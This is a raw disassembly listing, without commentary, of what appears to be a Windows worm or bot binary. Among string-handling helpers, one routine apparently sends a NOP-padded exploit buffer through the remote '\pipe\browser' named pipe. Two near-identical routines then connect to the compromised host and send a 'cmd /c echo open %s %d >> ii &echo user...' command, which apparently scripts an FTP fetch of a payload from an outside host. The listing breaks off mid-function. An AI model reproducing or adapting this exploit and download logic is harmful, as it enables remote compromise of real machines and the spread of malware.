cmp [ebx+8], eax
jnb short loc_40452C
call sub_422863
loc_40452C: ; CODE XREF: sub_404514+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40453E
mov esi, [ebp+arg_8]
loc_40453E: ; CODE XREF: sub_404514+25�j
cmp edi, ebx
jnz short loc_404560
push ds:dword_424280
add esi, ecx
mov ecx, edi
push esi
call sub_4046D8
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_4046D8
jmp short loc_4045D9
; ---------------------------------------------------------------------------
loc_404560: ; CODE XREF: sub_404514+2C�j
test esi, esi
jbe short loc_4045A3
cmp esi, eax
jnz short loc_4045A3
mov eax, [ebx+4]
test eax, eax
jnz short loc_404574
mov eax, offset dword_424290
loc_404574: ; CODE XREF: sub_404514+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_4045A3
push 1
mov ecx, edi
call sub_404667
mov eax, [ebx+4]
test eax, eax
jnz short loc_40458F
mov eax, offset dword_424290
loc_40458F: ; CODE XREF: sub_404514+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_4045D9
; ---------------------------------------------------------------------------
loc_4045A3: ; CODE XREF: sub_404514+4E�j
; sub_404514+52�j ...
push 1
push esi
mov ecx, edi
call sub_4045E2
test al, al
jz short loc_4045D9
mov eax, [ebx+4]
test eax, eax
jnz short loc_4045BD
mov eax, offset dword_424290
loc_4045BD: ; CODE XREF: sub_404514+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_417390
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_4045D9: ; CODE XREF: sub_404514+4A�j
; sub_404514+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_404514 endp
; =============== S U B R O U T I N E =======================================
sub_4045E2 proc near ; CODE XREF: sub_404032+3D�p
; sub_404464+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_4045F4
call sub_42298A
loc_4045F4: ; CODE XREF: sub_4045E2+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_40461D
mov al, [ecx-1]
cmp al, dl
jz short loc_40461D
cmp al, 0FFh
jz short loc_40461D
cmp edi, edx
jnz short loc_404658
dec al
push edx
mov [ecx-1], al
loc_404612: ; CODE XREF: sub_4045E2+47�j
mov ecx, esi
call sub_404667
loc_404619: ; CODE XREF: sub_4045E2+4B�j
; sub_4045E2+52�j
xor al, al
jmp short loc_404662
; ---------------------------------------------------------------------------
loc_40461D: ; CODE XREF: sub_4045E2+19�j
; sub_4045E2+20�j ...
cmp edi, edx
jnz short loc_404636
cmp [esp+8+arg_4], dl
jz short loc_40462B
push 1
jmp short loc_404612
; ---------------------------------------------------------------------------
loc_40462B: ; CODE XREF: sub_4045E2+43�j
cmp ecx, edx
jz short loc_404619
mov [esi+8], edx
mov [ecx], dl
jmp short loc_404619
; ---------------------------------------------------------------------------
loc_404636: ; CODE XREF: sub_4045E2+3D�j
cmp [esp+8+arg_4], dl
jz short loc_404653
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_404648
cmp eax, edi
jnb short loc_404660
loc_404648: ; CODE XREF: sub_4045E2+60�j
push 1
mov ecx, esi
call sub_404667
jmp short loc_404658
; ---------------------------------------------------------------------------
loc_404653: ; CODE XREF: sub_4045E2+58�j
cmp [esi+0Ch], edi
jnb short loc_404660
loc_404658: ; CODE XREF: sub_4045E2+28�j
; sub_4045E2+6F�j
push edi
mov ecx, esi
call sub_40473F
loc_404660: ; CODE XREF: sub_4045E2+64�j
; sub_4045E2+74�j
mov al, 1
loc_404662: ; CODE XREF: sub_4045E2+39�j
pop edi
pop esi
retn 8
sub_4045E2 endp
; =============== S U B R O U T I N E =======================================
sub_404667 proc near ; CODE XREF: sub_404032+1F�p
; sub_404032+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_404693
mov eax, [esi+4]
test eax, eax
jz short loc_404693
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_40468C
cmp al, 0FFh
jz short loc_40468C
dec al
mov [ecx], al
jmp short loc_404693
; ---------------------------------------------------------------------------
loc_40468C: ; CODE XREF: sub_404667+19�j
; sub_404667+1D�j
push ecx
call sub_4182AF
pop ecx
loc_404693: ; CODE XREF: sub_404667+8�j
; sub_404667+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_404667 endp
; =============== S U B R O U T I N E =======================================
sub_4046A3 proc near ; CODE XREF: _0:004043C3�p
; sub_4047FC+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_4045E2
test al, al
jz short loc_4046D1
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_417390
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_4046D1: ; CODE XREF: sub_4046A3+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_4046A3 endp
; =============== S U B R O U T I N E =======================================
sub_4046D8 proc near ; CODE XREF: sub_404514+39�p
; sub_404514+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_4046EB
call sub_422863
loc_4046EB: ; CODE XREF: sub_4046D8+C�j
mov ecx, edi
call sub_4047FC
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_404701
mov ebx, eax
loc_404701: ; CODE XREF: sub_4046D8+25�j
test ebx, ebx
jbe short loc_404737
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_4182C0
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_4045E2
test al, al
jz short loc_404737
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_404737: ; CODE XREF: sub_4046D8+2B�j
; sub_4046D8+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_4046D8 endp
; =============== S U B R O U T I N E =======================================
sub_40473F proc near ; CODE XREF: sub_4045E2+79�p
mov eax, offset loc_423110
call sub_418290
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_404765
mov edi, [ebp+8]
loc_404765: ; CODE XREF: sub_40473F+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_404772
xor eax, eax
loc_404772: ; CODE XREF: sub_40473F+2F�j
push eax
call sub_4185F5
pop ecx
mov [ebp+8], eax
jmp short loc_4047A3
; ---------------------------------------------------------------------------
loc_40477E: ; DATA XREF: _1:00424F9C�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40478D
xor eax, eax
loc_40478D: ; CODE XREF: sub_40473F+4A�j
push eax
call sub_4185F5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40479D
retn
; ---------------------------------------------------------------------------
loc_40479D: ; DATA XREF: sub_40473F+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_4047A3: ; CODE XREF: sub_40473F+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_4047C1
cmp eax, edi
jbe short loc_4047B0
mov eax, edi
loc_4047B0: ; CODE XREF: sub_40473F+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_417390
add esp, 0Ch
loc_4047C1: ; CODE XREF: sub_40473F+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_404667
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_4047E1
mov edi, ebx
loc_4047E1: ; CODE XREF: sub_40473F+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40473F endp
; =============== S U B R O U T I N E =======================================
sub_4047FC proc near ; CODE XREF: sub_4046D8+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_404829
mov al, [esi-1]
test al, al
jz short loc_404829
cmp al, 0FFh
jz short loc_404829
push 1
call sub_404667
push esi
call sub_417AB0
pop ecx
push eax
push esi
mov ecx, edi
call sub_4046A3
loc_404829: ; CODE XREF: sub_4047FC+9�j
; sub_4047FC+10�j ...
pop edi
pop esi
retn
sub_4047FC endp
; =============== S U B R O U T I N E =======================================
sub_40482C proc near ; DATA XREF: _2:00426008�o
test ds:byte_4CDCAC, 1
jnz short loc_40483C
or ds:byte_4CDCAC, 1
loc_40483C: ; CODE XREF: sub_40482C+7�j
jmp $+5
push offset nullsub_2
call sub_418670
pop ecx
retn
sub_40482C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40484E proc near ; DATA XREF: _2:0042600C�o
jmp $+5
sub_40484E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404853 proc near
mov eax, ds:dword_428BE0
add eax, 6
mov ds:dword_436EF8, eax
retn
sub_404853 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404861 proc near ; CODE XREF: sub_404861+D0�p
; sub_40494F+471�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_404875
or [ebp+arg_7], 1
jmp short loc_404879
; ---------------------------------------------------------------------------
loc_404875: ; CODE XREF: sub_404861+C�j
and [ebp+arg_7], 0FEh
loc_404879: ; CODE XREF: sub_404861+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40489D
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_4048AF
; ---------------------------------------------------------------------------
loc_40489D: ; CODE XREF: sub_404861+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_4048AF: ; CODE XREF: sub_404861+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_417B89
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_404948
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_42407C ;; WriteFile
test eax, eax
jz short loc_40493F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40493F
push [ebp+arg_20]
call sub_417C3B
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40493B
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_404861
add esp, 2Ch
jmp short loc_40494A
; ---------------------------------------------------------------------------
loc_40493B: ; CODE XREF: sub_404861+B3�j
mov al, 1
jmp short loc_40494A
; ---------------------------------------------------------------------------
loc_40493F: ; CODE XREF: sub_404861+9C�j
; sub_404861+A4�j
push [ebp+arg_20]
call sub_417C3B
pop ecx
loc_404948: ; CODE XREF: sub_404861+61�j
xor al, al
loc_40494A: ; CODE XREF: sub_404861+D8�j
; sub_404861+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_404861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40494F proc near ; CODE XREF: _0:00404F4D�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = qword ptr -28h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = qword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_417B30
push ebx
push esi
push edi
push offset a_ ; "."
push [ebp+arg_0]
call sub_418790
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
jz short loc_4049C2
push [ebp+arg_0]
mov esi, 2000h
lea eax, [ebp+var_20DC]
push offset loc_428628
push esi
push eax
call sub_41782A
push 20h
lea eax, [ebp+var_DC]
push ebx
push eax
call sub_417330
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_C8], eax
mov eax, offset byte_436EDC
push ebx
push eax
push eax
lea eax, [ebp+var_DC]
push eax
call sub_422A40
jmp short loc_4049C7
; ---------------------------------------------------------------------------
loc_4049C2: ; CODE XREF: sub_40494F+23�j
mov esi, 2000h
loc_4049C7: ; CODE XREF: sub_40494F+71�j
push [ebp+arg_0]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_404A0B
loc_404A04: ; CODE XREF: sub_40494F+194�j
; sub_40494F+36A�j ...
xor al, al
jmp loc_404E4F
; ---------------------------------------------------------------------------
loc_404A0B: ; CODE XREF: sub_40494F+B3�j
push 48h
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_417330
push 10h
mov [ebp+var_B8], 5
pop eax
mov [ebp+var_B7], bl
push 1
mov [ebp+var_B4], eax
pop edi
mov [ebp+var_B6], 0Bh
push eax
lea eax, [ebp+var_98]
push offset dword_428C34
push eax
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call sub_417390
push 10h
lea eax, [ebp+var_84]
push offset dword_428C20
push eax
mov [ebp+var_88], 3
call sub_417390
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call ds:dword_42407C ;; WriteFile
test eax, eax
jnz short loc_404AE8
loc_404ADA: ; CODE XREF: sub_40494F+265�j
push [ebp+var_4]
call ds:off_424078
jmp loc_404A04
; ---------------------------------------------------------------------------
loc_404AE8: ; CODE XREF: sub_40494F+189�j
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call ds:off_424074
push ebx
call sub_4186B1
push eax
call sub_417302
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_417330
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_417330
add esp, 20h
call sub_41730C
mov esi, [ebp+arg_4]
mov [ebp+var_70], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
cmp ds:byte_428BC8[esi], bl
jz short loc_404B5F
push 4
mov dword ptr [ebp+var_28+4], edi
mov dword ptr [ebp+var_28], ebx
mov [ebp+var_2C], edi
push offset dword_436F00
jmp short loc_404B72
; ---------------------------------------------------------------------------
loc_404B5F: ; CODE XREF: sub_40494F+1FC�j
push 2
mov dword ptr [ebp+var_28], ebx
pop eax
push 4
mov dword ptr [ebp+var_28+4], eax
mov [ebp+var_2C], eax
push (offset loc_428C17+1)
loc_404B72: ; CODE XREF: sub_40494F+20E�j
lea eax, [ebp+var_20]
push eax
call sub_417390
add esp, 0Ch
call sub_41730C
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_41730C
cdq
idiv edi
mov eax, ds:dword_428BBC[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+arg_0], eax
inc edx
mov [ebp+var_1C], edx
call sub_417B89
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_404ADA
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_417330
mov eax, [ebp+arg_0]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_417330
mov eax, ds:dword_428BC4[esi]
push 7
add eax, edi
push offset dword_428BB0
push eax
mov [ebp+arg_4], eax
call sub_417390
mov eax, [ebp+arg_4]
push 15Ch
add eax, 7
push offset dword_428A50
push eax
call sub_417390
mov eax, ds:dword_428BC0[esi]
add esp, 30h
cmp ds:byte_428BC8[esi], bl
mov [ebp+arg_4], eax
jz short loc_404C6B
push 4
add eax, edi
push offset dword_436EF8
push eax
call sub_417390
add [ebp+arg_4], 0Ch
mov esi, offset dword_428BE0
mov eax, [ebp+arg_4]
push 4
add eax, edi
push esi
push eax
call sub_417390
mov eax, [ebp+arg_4]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+arg_4], eax
call sub_417390
mov eax, [ebp+arg_4]
push 4
add eax, 0Ch
push esi
push eax
call sub_417390
add esp, 30h
jmp short loc_404C93
; ---------------------------------------------------------------------------
loc_404C6B: ; CODE XREF: sub_40494F+2CD�j
add eax, edi
mov [ebp+var_8], 10h
mov [ebp+arg_4], eax
mov esi, offset dword_428BE0
loc_404C7C: ; CODE XREF: sub_40494F+342�j
push 4
push esi
push [ebp+arg_4]
call sub_417390
add [ebp+arg_4], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_404C7C
loc_404C93: ; CODE XREF: sub_40494F+31A�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_404CBE
push [ebp+var_4]
call ds:off_424078
push edi
call sub_417C3B
pop ecx
jmp loc_404A04
; ---------------------------------------------------------------------------
loc_404CBE: ; CODE XREF: sub_40494F+358�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_417330
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_417390
mov eax, [ebp+arg_0]
mov [ebp-0Ch], ebx
mov dword ptr [ebp+var_14+4], eax
add esp, 10h
fild [ebp+var_14+4]
fmul ds:flt_424294
fstp [esp+14h+var_14]
call sub_417DEB
call sub_417DC4
push [ebp+arg_0]
mov [esi+1Ch], eax
mov [esi+18h], ebx
mov eax, [esi+1Ch]
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
call sub_417390
mov eax, [ebp+arg_0]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+arg_4], eax
jz short loc_404D2B
loc_404D23: ; CODE XREF: sub_40494F+3D7�j
inc eax
test al, 3
jnz short loc_404D23
mov [ebp+arg_4], eax
loc_404D2B: ; CODE XREF: sub_40494F+3D2�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_417390
add [ebp+arg_4], 1Ch
push edi
call sub_417C3B
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_417330
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call sub_417330
add esp, 28h
push ebx
push ebx
push 1
push ebx
call ds:dword_424090 ;; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+arg_0+3], bl
mov [ebp-0Ch], ebx
loc_404D98: ; CODE XREF: sub_40494F+4D3�j
cmp dword ptr [ebp-0Ch], 2
jge loc_404E2D
push 1
push 10B8h
push [ebp+arg_4]
inc dword ptr [ebp-0Ch]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4]
rep movsd
call sub_404861
add esp, 2Ch
test al, al
jz short loc_404E2A
cmp [ebp+var_4C], ebx
jz short loc_404E1C
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call ds:off_424074
test eax, eax
jnz short loc_404E03
call ds:dword_42408C ;; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_404A04
loc_404E03: ; CODE XREF: sub_40494F+4A1�j
push 3E8h
push [ebp+var_4C]
call ds:dword_424088 ;; WaitForSingleObject
cmp eax, 102h
jnz short loc_404E1C
mov byte ptr [ebp+arg_0+3], 1
loc_404E1C: ; CODE XREF: sub_40494F+480�j
; sub_40494F+4C7�j
cmp byte ptr [ebp+arg_0+3], bl
mov esi, [ebp+var_8]
jz loc_404D98
jmp short loc_404E2D
; ---------------------------------------------------------------------------
loc_404E2A: ; CODE XREF: sub_40494F+47B�j
mov esi, [ebp+var_8]
loc_404E2D: ; CODE XREF: sub_40494F+44D�j
; sub_40494F+4D9�j
push [ebp+var_4]
mov edi, ds:off_424078
call edi ; sub_4E03D5
push esi
call sub_417C3B
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_404E49
push [ebp+var_4C]
call edi ; sub_4E03D5
loc_404E49: ; CODE XREF: sub_40494F+4F3�j
cmp byte ptr [ebp+arg_0+3], bl
setnz al
loc_404E4F: ; CODE XREF: sub_40494F+B7�j
pop edi
pop esi
pop ebx
leave
retn
sub_40494F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E54 proc near ; CODE XREF: _0:00404F6B�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4241FC ;; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_424224 ;; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_424214 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_404F22
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_42421C ;; connect
cmp eax, 0FFFFFFFFh
jz short loc_404F22
mov edi, 400h
push esi
mov esi, ds:dword_424204
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_42F674
push eax
push eax
push ds:dword_436F0C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_424208 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_404F26
loc_404F22: ; CODE XREF: sub_404E54+50�j
; sub_404E54+62�j
xor eax, eax
jmp short loc_404F3D
; ---------------------------------------------------------------------------
loc_404F26: ; CODE XREF: sub_404E54+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_424220 ;; closesocket
push 1
pop eax
loc_404F3D: ; CODE XREF: sub_404E54+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_404E54 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
xor ebx, ebx
loc_404F47: ; CODE XREF: _0:00404F8D�j
lea eax, [esp+14h]
push ebx
push eax
call sub_40494F
pop ecx
test al, al
pop ecx
jz short loc_404F7A
push 65h
lea esi, [esp+14h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404E54
add esp, 0C0h
test eax, eax
jnz short loc_404F95
loc_404F7A: ; CODE XREF: _0:00404F56�j
test ebx, ebx
jnz short loc_404F89
push 7D0h
call ds:dword_424064 ;; Sleep
loc_404F89: ; CODE XREF: _0:00404F7C�j
inc ebx
cmp ebx, 2
jb short loc_404F47
xor eax, eax
loc_404F91: ; CODE XREF: _0:00404F98�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404F95: ; CODE XREF: _0:00404F78�j
push 1
pop eax
jmp short loc_404F91
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F9A proc near ; CODE XREF: _0:00405119�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4241FC ;; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_424224 ;; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_424214 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_405068
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_42421C ;; connect
cmp eax, 0FFFFFFFFh
jz short loc_405068
mov edi, 400h
push esi
mov esi, ds:dword_424204
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_42F674
push eax
push eax
push ds:dword_436F0C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_424208 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_40506C
loc_405068: ; CODE XREF: sub_404F9A+50�j
; sub_404F9A+62�j
xor eax, eax
jmp short loc_405083
; ---------------------------------------------------------------------------
loc_40506C: ; CODE XREF: sub_404F9A+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_424220 ;; closesocket
push 1
pop eax
loc_405083: ; CODE XREF: sub_404F9A+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_404F9A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+0Ch]
push edi
push eax
mov word ptr [ebp-10h], 2
call ds:dword_43ADD8 ;; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call ds:dword_43AD98 ;; htons
push 6
push 1
push 2
mov [ebp-0Eh], ax
call ds:dword_424214 ;; socket
mov esi, eax
